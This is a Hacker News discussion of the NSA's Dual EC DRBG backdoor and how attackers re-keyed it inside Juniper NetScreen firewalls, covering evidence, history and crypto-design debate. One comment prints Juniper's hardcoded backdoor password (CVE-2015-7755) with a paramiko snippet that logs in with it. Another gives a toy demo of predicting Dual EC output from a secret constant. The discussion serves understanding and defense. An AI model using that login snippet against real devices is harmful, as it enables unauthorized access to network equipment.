[HN Gopher] The NSA's Backdoor in Dual EC
       ___________________________________________________________________
        
       The NSA's Backdoor in Dual EC
        
       Author : GordonS
       Score  : 263 points
       Date   : 2021-09-03 13:50 UTC (9 hours ago)
        
 (HTM) web link (twitter.com)
 (TXT) w3m dump (twitter.com)
        
       | COGlory wrote:
       | A bit of a tangent, but why do people insist on posting these
       | things to twitter? They are so annoying to read like that. What
       | does twitter offer that other platforms, designed for this type
       | of content, don't?
        
         | JumpCrisscross wrote:
          | > _What does twitter offer that other platforms don't?_
         | 
         | Its audience.
        
           | teawrecks wrote:
           | Twitter has made it too annoying to use their site without an
           | account. I'm no longer part of that audience.
        
             | dylan604 wrote:
             | I'm sure Twitter sheds a tear for you and I not being
             | there, but laugh all the way to the bank for the millions
             | that are.
        
             | eli wrote:
             | Nobody goes there any more, it's too crowded
        
         | haswell wrote:
         | > _What does twitter offer that other platforms, designed for
          | this type of content, don't?_
         | 
         | Wide reach, and ongoing engagement/discussion.
         | 
         | I read threads like this because the follow-on discussion is
         | often just as or more interesting than the thread itself.
         | 
         | I think a blog post is also a good option here, but most blogs
         | aren't well suited for having a discussion.
        
           | matthewdgreen wrote:
           | Here's the blog post I wrote in 2015, if you prefer.
           | https://blog.cryptographyengineering.com/2015/12/22/on-
           | junip...
        
         | user-the-name wrote:
         | Readers.
        
       | JasonFruit wrote:
       | This bit stuck out to me:
       | 
       | > The second lesson is that "serious" people are always inclined
       | away from worst-case predictions. In bridge building and politics
       | you can listen to those people. But computer security is
       | adversarial: the conscious goal of attackers is to bring about
       | worst-case outcomes.
       | 
       | Are they suggesting that bridge-building and politics are _not_
       | adversarial? It seems to me that bridges and politics are weak
       | points that are frequently attacked.
       | 
       | Or am I missing sarcasm?
        
         | Youden wrote:
         | Yes, they're suggesting that bridge building isn't adversarial.
         | 
         | In bridge building you might often ignore questions like "what
         | if that nearby skyscraper fell on the bridge" or "what if there
         | was a 100-year flood every day for a week". They're scenarios
         | that can conceivably happen but they're very unlikely.
         | 
          | In computer security, you couldn't safely ignore such
          | scenarios, because you need to protect your digital bridge
          | from an adversary who has no problem demolishing the nearby
          | figurative skyscraper.
         | 
         | Of course there are real-world situations where bridge building
         | is adversarial, if you're in a war-zone for instance. I think
         | the author is discussing more civil situations like "should we
         | spend an extra $1B to make the bridge asteroid proof".
        
       | bm3719 wrote:
       | https://threadreaderapp.com/thread/1433470109742518273.html
        
         | sundarurfriend wrote:
         | With the new Twitter changes, this should become a HN rule -
         | that the OP should post a threadreader (or equivalent) link in
         | the comments if TFA is a Twitter post.
        
         | cream_n_cream wrote:
         | Thank you
        
         | unnouinceput wrote:
          | Thread Reader App is missing the addendum.
         | 
         | Quote: "Addendum: the White House Press Secretary was asked
         | about this story, and their answer is "please stop asking about
         | this story." h/t " - https://youtu.be/Hfa6bih_gVc?t=1740
         | 
         | That's f*ing hilarious
        
       | dylan604 wrote:
        | The entire concept of a backdoor that only the good guys have the
        | keys to is so moronic as to make my blood boil. The TSA locks
        | were picked because a photo of the keys was posted online. The
        | encryption method that the NSA forced through, knowing how to
        | defeat it, got pwned. Yet the backdoor method still gets bandied
        | about like it's the one thing to save us when it is exactly what
        | will sink us.
        
         | tzs wrote:
          | > The entire concept of a backdoor that only the good guys have
          | the keys to is so moronic as to make my blood boil.
         | 
         | Uhm...isn't the whole basis of modern cryptography the idea
         | that you can have keys that only the good guys know? Every time
         | you use an HTTPS site for example you are relying on the
         | existence of keys that only the good guys know. Every time you
         | use an end to end encrypted messaging system you are relying on
         | the existence of keys that only the good guys know.
         | 
         | The issue with backdoors is not keeping keys secret. It is
         | keeping others from also installing backdoors.
        
           | dylan604 wrote:
           | I'm thinking you're not understanding the problem correctly.
           | Backdoors mean that people with that access can read things
           | without having the shared keys. You and I exchange keys so we
           | can communicate privately. Because only you and I have those
           | keys, nobody else can read those messages. However, because
           | the TLAs have backdoor access, you and I and the TLAs can
           | read the messages. However, you and I don't know that or at
           | least we're unaware when it is occurring (because we read
           | things like HN and are at least aware of backdoors). Now, bad
           | actor #1 discovers the backdoor and jimmies the lock, and now
           | they can read our "private" messages. Then bad actor #2 comes
           | along and releases to the public how to use the backdoor on
           | anyone's private messages, and now nothing is private and the
           | crypto is a waste of energy. Then the TLAs come along and
            | make it illegal to distribute code that allows access to the
           | backdoors and someone releases a new t-shirt.
           | 
           | The rest of the world sits back and says "I told you so".
        
           | asimpletune wrote:
           | > Uhm...isn't the whole basis of modern cryptography the idea
           | that you can have keys that only the good guys know?
           | 
            | Not in any way, but based on your other examples, maybe
           | you're thinking about certificate authorities?
        
         | [deleted]
        
         | khuey wrote:
         | The attackers didn't get the keys to the back door. They
         | actually replaced the entire door with a new door that they
         | made, which went unnoticed (by Juniper) for 3 years, locking
         | out the owners of the original back door too. It's a rather
         | impressive attack.
        
           | marcan_42 wrote:
           | No, the attackers just re-pinned the backdoor lock cylinder
           | that the NSA put on their "secure" door. That's why nobody
           | noticed. The NSA conveniently left them a door with a
           | backdoor they could hijack in a way that is effectively
           | invisible.
           | 
           | Replacing the whole door would've been like replacing the
           | entire DRBG, which would've much more likely raised alarms.
        
             | eli wrote:
             | Having a convenient backdoor already integrated definitely
             | aided the attack, but a sophisticated attacker with the
             | ability to silently modify your codebase is a pretty bad
             | place to start from regardless.
        
               | convolvatron wrote:
               | how would you possibly prevent such a thing? even if
               | Juniper subjected all potential employees to clearance-
               | like screening - that's not foolproof either.
        
           | soraminazuki wrote:
           | From the original link:
           | 
           | > In practice this would simply mean hacking into a major
           | firewall manufacturer's poorly-secured source code
           | repository, changing 32 bytes of data, and then waiting for
           | the windfall when a huge number of VPN connections suddenly
           | became easy to decrypt. And that's what happened. 10/
           | 
           | I would definitely not describe replacing 32 bytes as
           | "replacing an entire door."
        
         | markus_zhang wrote:
         | There is no good/bad guy in this scenario if you model the
         | world in a way such that there are people who have and people
         | who don't.
        
           | dleslie wrote:
           | Sure there is!
           | 
           | There are people who act with malice and sadism, people
           | driven to harm others, people overwhelmed by greed and people
           | consumed by a lust for power. And there are people who devote
           | their lives to aiding others, people who are mindful of their
           | community's needs, people who take opportunities to help
           | others over opportunities to help themselves.
           | 
           | All these sorts can be found across the whole spectrum of
           | wealth.
        
             | [deleted]
        
             | vorpalhex wrote:
             | While I generally agree with your take, it's important to
             | remember that the road to hell is paved with good
             | intentions. Sometimes the most evil actors are those
             | knights who believe they are fighting for some great holy
             | cause.
        
               | bobbytit wrote:
               | Like the Climate religion for instance
        
       | perihelions wrote:
       | I don't understand the significance of the Dual EC
       | vulnerabilities here. The attackers had write access to the
       | target's crypto code, and altered it to their convenience. What
       | cryptosystem is secure against that threat model?
       | 
       | That the "re-keying" edit fits in 32 bytes is a neat math trick,
       | but doesn't seem to me like a central issue. What am I
       | misunderstanding?
       | 
       | > _" In practice this would simply mean hacking into a major
       | firewall manufacturer's poorly-secured source code repository,
       | changing 32 bytes of data, and then waiting for the windfall when
       | a huge number of VPN connections suddenly became easy to decrypt.
       | And that's what happened. 10/"_
        
         | tinus_hn wrote:
         | Now do this without anyone noticing!
        
         | trasz wrote:
         | The central issue was that the algorithm was backdoored in the
         | first place, by NSA.
        
         | yk wrote:
         | It's the kind of hack that survives a security audit. There is
         | no leaked data or anything, it is just that afterwards the
         | crypto works precisely as the standard intended.
        
         | khuey wrote:
         | The implication here is that the "change a 32 byte constant
         | that nobody knows the provenance of to begin with" thing is
         | what allowed this to fly under the radar for 3 years compared
         | to an "if (attacker) { give_root(); }"-style insertion.
        
           | [deleted]
        
         | cryptonector wrote:
         | The way Dual_EC works, to exploit it you need a TLS extension
         | that has the server send "large nonces", which you use along
         | with knowledge of the backdoor key to recover RNG state and so
         | recover the server's Diffie-Hellman keys.
         | 
         | Now, if the backdoor is in place but no one was using it, no
         | one would know if the public backdoor key got changed. But the
         | attacker gets to decrypt all these sessions. OTOH, if NSA was
         | trying to use the backdoor and noticed it wasn't working, they
         | might start looking into it and find the hack.
         | 
         | So being able to make a very small source code change (32 bytes
         | of public key material in this case) that has this impact is
          | fantastic, because that change is small enough that no one
          | might notice it for a long time (which is apparently what
          | actually happened).
         | 
         | But you're right, if you can change the source code then you
         | can add a backdoor anyways, so Dual_EC being backdoored is not
         | what was fatal to the Juniper systems. What was fatal to them
         | is that they had poor internal security.
         | 
         | Still, an intentional backdoor _key_ is plausibly -likely even-
         | easier to replace than a backdoor is to add. So this is a
          | decent argument against intentional backdoors. But it's not
         | really a devastating argument against intentional backdoors.
         | 
         | Intentional backdoors are bad for political reasons too -- or
         | good, maybe, depending on your point of view. Intentional
         | backdoors are bad because the key to the backdoor can leak, and
         | when that happens it can be very hard to fix -- this _is_
         | devastating to security of the backdoored system, so I think it
         | is a devastating argument against intentional backdoors,
          | especially for a backdoor where exploitation is _passive_,
         | like Dual_EC.
         | 
         | Dual_EC was a fine covert key escrow system for U.S. government
         | systems, but there was no need to make it covert if it was only
         | for that.
         | 
         | EDIT: But the real problem with Dual_EC is that it's terribly
         | slow. /s
        
       | gzer0 wrote:
       | Searching for the text "strcmp" finds a static string that is
       | referenced in the sub_ED7D94 function. Looking at the strings
       | output, we can see some interesting string references, including
       | auth_admin_ssh_special and auth_admin_internal. Searching for
       | auth_admin_internal finds the sub_13DBEC function. This function
       | has a strcmp call that is not present in the 6.3.0r19b firmware:
       | The argument to the strcmp call is <<< %s(un='%s') = %u, which is
       | the backdoor password, and was presumably chosen so that it would
       | be mistaken for one of the many other debug format strings in the
       | code. This password allows an attacker to bypass authentication
       | through SSH and Telnet.
       | 
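        | Testing a device for it is just an SSH login with that fixed
        | password; a sketch with paramiko (the host address is a
        | placeholder):
        | 
        |   import paramiko
        | 
        |   client = paramiko.SSHClient()
        |   client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        |   # any username works; the password is the hardcoded string
        |   # masquerading as a debug format string
        |   client.connect("192.0.2.1", username="admin",
        |                  password="<<< %s(un='%s') = %u")
        | 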
       | [1] is the backdoor. [2] is more details regarding discovery.
       | 
       | [1] https://github.com/rapid7/metasploit-
       | framework/blob/master/m...
       | 
       | [2] https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-
       | scr...
        
         | samuel wrote:
          | That's one of them, and the less interesting of the two. I
          | remember that the other one was far more concealed and involved
          | a global variable or something like that; the code wasn't
          | doing what it appeared to be doing.
          | 
          | There was an amazing blog entry which explained it, but I can't
          | find it right now.
         | 
         | Edit: I don't think this was the one I read, but it's similar.
         | https://cryptologie.net/article/316/junipers-backdoor/
         | 
          | Basically, Dual EC was chained to another PRNG, so the output
          | should have been robust to crypto vulnerabilities discovered in
          | either of them. The thing is, the second one was never called,
          | because the loop's index (a global variable) was set to 32
          | inside a function call, so the loop never ran.
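          | 
          | The shape of the bug, as a minimal sketch (all names made
          | up, mirroring the structure described there, not Juniper's
          | actual code):
          | 
          |   import os
          | 
          |   index = 0                  # global, shared by both functions
          | 
          |   def dual_ec_output():      # stand-in for the Dual EC DRBG
          |       return os.urandom(32)
          | 
          |   def x931_whiten(block):    # stand-in for the second PRNG
          |       return block
          | 
          |   def prng_reseed():
          |       global index
          |       index = 0
          |       while index < 32:      # fill the seed buffer...
          |           index += 1         # ...and leave index == 32
          | 
          |   def prng_generate():
          |       global index
          |       prng_reseed()          # clobbers the shared index
          |       raw = dual_ec_output()
          |       out = b""
          |       while index < 32:      # already false: dead code, the
          |           out += x931_whiten(raw)  # second PRNG never runs
          |           index += 1
          |       return out or raw      # raw Dual EC output escapes
          | 
          | An audit that just reads the code sees the whitening loop
          | and says fine; only tracing the global at runtime shows the
          | loop body never executes.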
        
       | inasio wrote:
       | My favourite part is that the NSA acknowledged to Wyden that they
       | had written a lessons learned memo, and when asked to produce it
       | they could never find it...
       | 
       | "In a July 2020 response to Wyden and other members of Congress,
       | Juniper provided few new details of the case but blamed the
       | intrusions on a "sophisticated nation-state hacking unit." NSA
       | told Wyden's staff in 2018 that there was a "lessons learned"
       | report, but the agency "now asserts that it cannot locate this
       | document," according to a Wyden aide. "
        
       | GuB-42 wrote:
       | Do we have some kind of proof about the backdoor?
       | 
        | It has been quite a while since security researchers published
        | findings about a potential backdoor in Dual_EC_DRBG, and even
        | without the backdoor, they found it rather weak. That was even
        | before it became a standard.
       | 
        | Then there are mentions of the NSA's intent to backdoor
        | encryption standards, and the surprising push for making that
        | dubious algorithm a standard.
       | 
        | It makes the scenario of an NSA backdoor very likely, but strong
        | suspicion is not proof, and yet all these articles state it as
        | fact. Did I miss something, or are they jumping to conclusions?
        | Not saying they didn't do it, they most likely did, but if I get
        | accused of a crime one day, I hope that the court will be held to
        | higher standards.
       | 
        | And there are many things I don't get about that story.
        | Dual_EC_DRBG was suspicious from day one; I can't imagine an
        | enemy of the US using it except to transmit misinformation. No
        | need for leaks, the very existence of the algorithm is enough. If
        | the story is true (it is an NSA backdoor), then it is really a
        | show of incompetence (like the whole mess with Snowden, really),
        | or maybe part of the plan of a mastermind. I bet on the former.
        
         | mananaysiempre wrote:
         | Depends on what you mean by " _the_ backdoor".
         | 
         | That the generator is undetectably backdoor _able_ through
         | choice of constants has never been in question, from what I
         | understand, and has been known outside the NSA (who designed it
         | and chose the constants) via an explicit construction since
         | before the relevant standard was finalized; it's also so
         | pointlessly slow nobody would normally include it in their own
         | software except maybe out of completionism, which was ANSI's
         | official motivation for including it as well. (Green's 2015
         | blog post[1] has the history and references.)
         | 
         | It's also long been certain that Juniper included that
         | generator in their software with the standard constant, then
         | were hacked and afterwards for several years their software
         | included in that place a _different_ constant, with no other
         | code changes, and finally an official emergency security update
         | rolled that value back. The presence of the generator was not
          | mentioned in the official documentation either before or
         | after the hack, and the code gave the appearance of combining
         | its output with that of another generator (which would have
         | eliminated the backdoorability) while in fact not doing so
         | because of something that looks like a logic bug. (I haven't
         | gathered the links on this but the surrounding comments here
         | have most of them I think.)
         | 
          | Now, to me this seems like overwhelming evidence that Juniper
          | products have had a crippling security vulnerability due to the
          | known backdoorability of Dual_EC_DRBG, without Juniper wanting
          | it so. There is just no other plausible reason to break into
          | Juniper and, out of everything you could change, change this
          | one apparently pseudorandom string.
         | 
         | To make an argument against standardizing or using backdoorable
         | cryptographic algorithms (Green's point in the thread under
         | discussion), this is as far as we need to get. The only thing
         | the rest is relevant for is NSA's reputation, government
         | backdoors, and willing participation in them; but the Juniper
         | story already suggests that the distinction between backdoor
         | _able_ and backdoor _ed_ (and broken) is at best academic.
         | 
         | * * *
         | 
         | There is also a second place where Dual_EC_DRBG is known to be
         | implemented, and that is the RSA BSAFE library. This library
         | also includes but in most builds does not enable a weird TLS
         | extension from what came to be known as the Extended Random
         | family, though old and uninteresting Internet-connected devices
         | have been spotted with it enabled. Now, the only thing this
         | extension does--the thing it was described to be _for_ by
         | people bearing a US government badge who presented the
         | Internet-Drafts on the IETF mailing lists--is expose more raw
         | randomness from the system's cryptographic random generator. No
         | cryptographer anywhere has ever (publicly) described or even
         | suggested any way to use this to improve the security of TLS in
         | any configuration, including the authors of the Internet-
         | Drafts. (See Green's 2017 post[2] and links therein for the
         | details.) However, if you are trying to break the system's
         | vulnerable random generator, exposing more of its output is
         | immediately useful.
         | 
         | We are now two for two in commercial vendors of security
         | products who implemented Dual_EC_DRBG also exposing its raw
         | output (thus enabling the exploitation of the backdoor if one
         | is configured through the choice of its constant) through ways
         | that are both unusual and unnecessary for the operation of the
         | product (logic bug for Juniper, completely useless and unused
         | experimental TLS extension for RSA).
         | 
          | That anyone implemented Dual_EC_DRBG in the first place
          | necessitates an explanation. Random generators are essential in
          | cryptographic systems, but unlike ciphers and such they are a
          | completely opaque implementation detail--somebody you're
          | communicating with not only mustn't depend on but actually
          | can't distinguish which generator you're using (indeed a
          | generator that can be distinguished is defined to be broken).
          | Thus the choice of generator is a combination of speed (and
          | it's a speed-critical component), ease of implementation, and
          | confidence in the cryptography. Not only is the cryptography in
         | Dual_EC_DRBG dodgy and known to be so--it's a choice of 32 data
         | bytes away from being completely and undetectably broken--it's
         | also hard to implement (elliptic curves in general are Hell on
         | Earth, and while careful choices like in *25519 and *448 can
         | mitigate that somewhat, Dual_EC_DRBG as standardized doesn't
         | have the necessary structure) and most importantly _stupidly
         | slow_. It _might_ make sense for ANSI (or, indeed, the NSA) to
         | include it on the list in case it turns out 20 years later that
         | the assumed-intractable problems underlying every other
         | generator aren't but elliptic curve logarithm still is (this
         | was the official motivation), but as an implementor the one
         | choice you're going to omit absent an external reason is the
         | generator which requires difficult mathematics and is also _two
         | orders of magnitude_ slower. Dual_EC_DRBG is not "suspicious"
         | as a choice of random generator, it's _stupid_.
         | 
         | This, I think, is enough to rule out any non-extraordinary
         | hypotheses on why both Juniper and RSA included Dual_EC_DRBG in
         | their products, and as extraordinary hypotheses go, "NSA paid
         | them to, either directly or by imposing that condition in
         | government contracts, because it did choose a constant enabling
         | the backdoor for the generator it invented" is a pretty good
         | one. It's also corroborated by (otherwise questionable but
         | plausible) reports of the NSA doing just that for Juniper (in
         | the Yahoo Finance / Bloomberg report under discussion here) and
         | RSA (quite some time ago[3], although it never rose above a
         | rumour and RSA PR tried to run some damage control at the
         | time). This also mostly discharges the questions as to why NSA
         | would create and champion a known-backdoorable algorithm for
         | the standard in the first place, all while dodging the constant
         | choice question in the committee discussions (and even if they
         | birthed this monster for some other reason, they could hardly
         | have missed a freaking _patent_ on the technique filed while
         | standardization still was underway).
         | 
         | All in all, this looks like strong enough evidence to overcome
         | the conspiracy-theoretic penalty and leave me reasonably
         | certain the NSA really did both consciously put this into the
         | standards and spend years pushing it into commercial products.
         | 
         | As to the question of the enemies of the US using this, I can
         | offer two points:
         | 
         | - Cryptography is obscure, the infrastructural importance of
         | computer systems is widely underestimated, and government (or
         | corporate, or diplomatic, or any large organization's)
         | bureaucracy everywhere is pathologically incapable of staying
         | on top of important details. Nobody ever got fired for buying
         | Juniper firewalls or licensing RSA libraries; it's the
         | respectable, enterprisey thing to do. (Furthermore, not that
         | many reputable companies make VPN appliances at all; for all we
         | know Cisco weren't any smarter.)
         | 
         | - National security, intelligence and counterintelligence,
         | state security, secret police, however your place and time of
         | birth call them, have been thoroughly rotten for as long as
         | they have existed, maybe longer. The crossover Crusader / Big
          | Data mentality, "surveil everyone and let God sort them out",
         | has always been the default. (As well as the old Soviet adage,
         | "give me the man and I'll find you the charge", although in
         | more civilized places one is hopefully forced to use blackmail
         | and not the legal system.) There don't need to _be_ any real
         | enemies of the US (or wherever) in the chosen direction as long
         | as your salary or purpose in life depends on finding them; and,
         | to be fair, it's not as if the US doesn't have plenty of
         | enemies within or without.
         | 
         | And that's a damn shame, because the problem of national
         | security (to use modernity's chosen term) is not imaginary;
         | it's just that the solution, even given sincere and well-
         | meaning people as input, always comes out sick.
         | 
         | Finally, regarding suspicion and proof, I don't really see the
         | distinction you're trying to make. If "strong suspicion" is to
         | be understood as "weak but not negligible evidence one is
         | struggling to formalize the reasoning for", I disagree that's
         | what we have; if instead it means "strong but circumstantial
         | evidence", I agree, but the boundary between that and "proof"
         | is largely nonexistent, especially in a situation such as this.
         | Unless yet another good person self-immolates specifically to
         | expose the nature of this particular trick in the NSA's
          | enormous bag, this is as strong as the support for this
          | hypothesis is going to get, so demanding "proof" as opposed
          | to the current
         | "strong suspicion" seems epistemically counterproductive to me.
         | There's been enough fire for few enough results that I can't in
         | good conscience advocate anyone inflict more on themselves;
         | this particular bit of trivia by itself also seems not worth
         | giving up one's life over.
         | 
         | (Snowden's factual contribution to this specific story has been
         | vague enough that it's not particularly worth mentioning--
         | something something working with and/or to compromise vendors,
         | something something breaking "most encryption on the Internet"
         | --except maybe for drawing people's attention to the points
         | above, all of which are from other and frequently earlier
         | sources. "Lent credence" is right.)
         | 
         | * * *
         | 
         | What part of the "mess with Snowden" do you count as
         | incompetence? The exfiltration approach he describes in his
         | book does sound like run-of-the-mill incompetence if taken at
         | face value, but that's hardly the part that people were (and, I
         | hope, still are) miffed about.
         | 
         | [1]
         | https://blog.cryptographyengineering.com/2015/01/14/hopefull...
         | 
         | [2] https://blog.cryptographyengineering.com/2017/12/19/the-
         | stra...
         | 
         | [3] https://www.cnet.com/tech/services-and-software/security-
         | fir...
        
       | Y_Y wrote:
       | > the field is called computer security; not computer optimism
       | 
       | I'd like to go even further and propose the following terms:
        |   * computer wishful thinking
        |   * security by credulity
        |   * zero-skepticism proof
        
         | krylon wrote:
         | "zero-skepticism proof" is an amazing name. Don't mind if I
         | borrow that from time to time. ;-)
        
           | reaperducer wrote:
           | That's the name of my Rage Against the Machine tribute band.
        
         | not2b wrote:
         | The NSA actually had their own term for this, NOBUS, which
         | meant "nobody but us". They were fond of attacks that they
         | thought nobody but the NSA could exploit. They were arrogant
         | enough to think they were better than all adversaries.
        
           | Gibbon1 wrote:
           | That's insane when the Chinese are playing the game too.
        
           | a1369209993 wrote:
            | Nitpick: the acronym is actually "No _One_ But US", IIRC.
        
           | sigg3 wrote:
           | What do you mean "were"..?
        
             | harry8 wrote:
              | They're probably not dumb enough to think that they're so
              | much better than their adversaries that they can do this
              | stuff and have it be fine anymore, given how badly they've
              | just been exposed in public.
             | 
             | Not saying that will change behaviour but it's hard even
             | for the massively delusional to continue to really believe
             | they can walk on water when they find themselves under it.
        
         | sneak wrote:
         | I have read that "hope is not a strategy" is a common aphorism
         | amongst SREs at Google.
        
         | markus_zhang wrote:
         | security by certification
        
       | You-Are-Right wrote:
        | Serious joke question: do commercial firewalls without backdoors
        | exist? Please include evidence in your answer, thanks!
        
       | bob1029 wrote:
       | Calling out the cryptographic community on this has always
       | resulted in becoming tarred & feathered in my experience. "How
        | _dare_ you question these experts? You are _not_ a cryptographer."
       | 
       | No, I am not. But, I understand information theory and people. I
       | don't need an ivory tower credential to call out potential
       | bullshit or leverage my own intuition.
       | 
       | This kind of nonsense also makes me wonder how many of those
       | "dont roll your own crypto" people are intentionally pushing
       | developers towards these state-sponsored libraries & methods.
        
         | not2b wrote:
         | But the cryptographic community was RIGHT on this, with at
         | least six papers from respected researchers raising concerns
         | back around 2007. It was businesses (like RSA and Juniper) that
         | overrode these concerns under pressure.
        
         | ackbar03 wrote:
          | Then you, my friend, are free to roll your own crypto
        
           | bob1029 wrote:
            | Just so we are clear, rolling my own crypto doesn't
           | necessarily involve reinventing SHA256 and AES from scratch.
           | 
           | It just means using these primitives directly rather than
           | farming out and allowing others to select the underlying
           | methods for you.
           | 
           | I use Microsoft's cryptographic implementations, but I don't
           | let them pick the method for me. I don't think this is
           | unreasonable if you have some experience in the space.
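            | 
            | For instance, something like this (a sketch with Python's
            | pyca/cryptography, same spirit as calling the .NET
            | primitives directly):
            | 
            |   import os
            |   from cryptography.hazmat.primitives.ciphers.aead \
            |       import AESGCM
            | 
            |   key = AESGCM.generate_key(bit_length=256)  # my choice,
            |   nonce = os.urandom(12)          # not a framework default
            |   ct = AESGCM(key).encrypt(nonce, b"payload", b"header")
            |   assert AESGCM(key).decrypt(nonce, ct, b"header") == \
            |       b"payload"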
        
             | marcus_holmes wrote:
             | It's that old saw of "anyone can create a security system
             | that they can't break". How do you _know_ that your
             | combination of methods is secure?
             | 
             | There may well be hidden (or at least non-obvious)
             | complications with using certain methods and/or
             | implementations together that make them easier to break. If
             | you're not aware of that, but someone else is, then the
             | first you'll know about it is years later when a security
             | leak is traced back to your "secure" system. And the only
             | other way of knowing about this sort of stuff is to spend a
             | lot of time staying current with the research.
             | 
             | Or you can let someone else do all that hard work, and run
             | the extremely small risk that their work has been silently
             | compromised by the NSA (or other state actor of your
             | choice).
        
               | a1369209993 wrote:
               | > How do you know that your combination of methods is
               | secure?
               | 
               | Because if you give me some hashes, some messages, and a
                | black box that signs arbitrary things for an arbitrary
               | public key (with my combination of methods), I can turn
               | around and give you back either a preimage of one of the
                | hashes or a second preimage of one of the messages.
                | Provable
               | security is nice.
               | 
               | Still working on how to extend such a scheme to key
               | agreement rather than just signing, admittedly.
        
             | marcan_42 wrote:
             | Putting together primitives in a way that doesn't have
              | subtle flaws is not trivial. Many a standard has been
             | vulnerable due to this. You think you can do better?
             | 
             | We _do_ have simple, well engineered, and sometimes even
             | probably secure constructions. Look at libsodium if you
             | want a decent example of what a modern library looks like.
             | 
             | And stay away from anything that mentions the words NIST,
             | FIPS, or any other government acronym. You aren't going to
             | find modern, well-engineered, simple crypto in anything
             | catering to that market. It's always hideously
             | overcomplicated and rife with chances for bugs.
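              | 
              | For a feel of the difference, this is essentially the
              | whole API surface for authenticated public-key
              | encryption in libsodium, via its PyNaCl binding (a
              | sketch; no algorithm or parameter choices are left to
              | the caller):
              | 
              |   from nacl.public import Box, PrivateKey
              | 
              |   sk_a = PrivateKey.generate()
              |   sk_b = PrivateKey.generate()
              | 
              |   # Curve25519 + XSalsa20-Poly1305, nonce handled for you
              |   box = Box(sk_a, sk_b.public_key)
              |   ct = box.encrypt(b"attack at dawn")
              |   assert Box(sk_b, sk_a.public_key).decrypt(ct) == \
              |       b"attack at dawn"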
        
               | dylan604 wrote:
               | >and sometimes even probably secure constructions
               | 
               | Probably doesn't make me feel secure. Did you mean
               | properly?
        
               | marcan_42 wrote:
               | Sorry, that was a typo, I meant _provably_. As in
               | constructions that have been proven to be secure assuming
               | the underlying primitives are secure.
        
               | dylan604 wrote:
               | I like provably better than properly. Now I feel warm and
               | fuzzy.
        
           | troyvit wrote:
           | Not that I sanction all of the parent's post, but for
           | instance Telegram did exactly that, and they still receive
           | grief for rolling their own crypto. So per the parent you can
           | either use back-doored state-sponsored encryption or roll
           | your own which nobody trusts. Which is better? Is there
           | another alternative?
        
             | marcan_42 wrote:
             | State sponsorship doesn't matter, what matters is that it's
             | secure. Everyone knew Dual-EC DRBG was likely backdoored,
             | it stank to hell and back. There are dozens of other
             | CSPRNGs, including other "state sponsored" ones, that
             | pretty clearly aren't. There is also a whole world of
             | crypto developed by people not associated with any state,
              | including the modern Curve25519/ChaCha based combinations
             | (which are partly a response to the idea that the widely
             | used NSA proposed ECC parameters may also be backdoored).
             | 
             | There are trustable people doing things right with easy to
             | use libraries you can just drop in today, with documented
             | rationale for the designs and without any "magic numbers"
             | (which are a telltale of the backdoored and suspected-
             | backdoored NSA algorithms).
        
       | markus_zhang wrote:
       | > Members of a hacking group linked to the Chinese government
       | called APT 5 hijacked the NSA algorithm in 2012, according to two
       | people involved with Juniper's investigation and an internal
       | document detailing its findings that Bloomberg reviewed. The
       | hackers altered the algorithm so they could decipher encrypted
       | data flowing through the virtual private network connections
       | created by NetScreen devices. They returned in 2014 and added a
       | separate backdoor that allowed them to directly access NetScreen
       | products, according to the people and the document.
       | 
       | Can we have more technical details regarding this? I guess some
        | heavy math (number theory) is involved here, but I'm really
        | intrigued by how it was developed.
        
         | Arkanum wrote:
         | Computerphile[1] did a video about the specifics of the
         | backdoor in Dual EC DRBG.
         | 
          | As I understand it, the hackers replaced the magic number Q
          | with a different value than the standards-compliant one, one
          | for which they had pre-computed the secret relation to P.
         | 
         | [1]:https://www.youtube.com/watch?v=nybVFJVXbww
        
         | khuey wrote:
         | APT 5 hacked into Juniper and replaced an input parameter to
         | the Dual EC PRNG that was backdoored by the NSA with one that
         | was backdoored by them.
         | 
         | https://dl.acm.org/doi/pdf/10.1145/3266291 goes into it in some
         | detail
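          | 
          | The core trick fits in a few lines. Here's a toy sketch in
          | Python (tiny made-up curve borrowed from a teaching
          | exercise, and no output truncation; real Dual EC uses P-256
          | and truncates, which only adds a small brute-force step for
          | the attacker). Whoever chooses the constants can pick a
          | secret d and set P = d*Q; one raw output then reveals the
          | generator's next state:
          | 
          |   p, a, b = 9739, 497, 1768   # curve y^2 = x^3 + a*x + b
          | 
          |   def inv(x): return pow(x, p - 2, p)
          | 
          |   def add(P1, P2):            # elliptic curve point addition
          |       if P1 is None: return P2
          |       if P2 is None: return P1
          |       (x1, y1), (x2, y2) = P1, P2
          |       if x1 == x2 and (y1 + y2) % p == 0: return None
          |       if P1 == P2: lam = (3*x1*x1 + a) * inv(2*y1) % p
          |       else: lam = (y2 - y1) * inv(x2 - x1) % p
          |       x3 = (lam*lam - x1 - x2) % p
          |       return (x3, (lam*(x1 - x3) - y1) % p)
          | 
          |   def mul(k, pt):             # scalar multiply, double-and-add
          |       acc = None
          |       while k:
          |           if k & 1: acc = add(acc, pt)
          |           pt, k = add(pt, pt), k >> 1
          |       return acc
          | 
          |   def lift(x):                # a curve point with that x
          |       return (x, pow((x**3 + a*x + b) % p, (p + 1)//4, p))
          | 
          |   Q = (1804, 5368)            # the "standard" constant
          |   d = 1337                    # the designer's secret...
          |   P = mul(d, Q)               # ...baked into P = d*Q
          | 
          |   def dual_ec(s, n):          # output x(s*Q); step s to x(s*P)
          |       out = []
          |       for _ in range(n):
          |           out.append(mul(s, Q)[0])
          |           s = mul(s, P)[0]
          |       return out
          | 
          |   r = dual_ec(4242, 4)        # victim's "random" output
          |   # knowing d: d*(s*Q) = s*(d*Q) = s*P, the *next* state
          |   s1 = mul(d, lift(r[0]))[0]
          |   assert dual_ec(s1, 3) == r[1:]   # future output predicted
          | 
          | Re-keying it, as APT 5 did, just means shipping a new
          | 32-byte Q whose secret relation to P you know yourself.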
        
       | tgbugs wrote:
        | Huh. I had not thought of the rekeying issues before. Glaringly
       | obvious in hindsight. The question of "how can you ensure that
       | this system will not be rekeyed to respond to someone else" is a
       | great one. The best answer is "there is nothing that can be
       | rekeyed."
        
       | jokoon wrote:
        | The amount of brain power that the NSA is using is staggering; it
        | is not surprising they have such an upper hand in cryptography.
       | 
        | I've heard the NSA is one of the biggest employers of math people.
       | 
       | At that point, I'm guessing some form of obscurity might somehow
       | be a better idea to protect data from the NSA, or at least it
       | would force NSA employees to analyze some obfuscated data, buying
       | more time than just using mainstream methods.
       | 
        | In the end, I don't think anybody has a good enough reason to hide
       | stuff from the US government, at least that's my opinion, as long
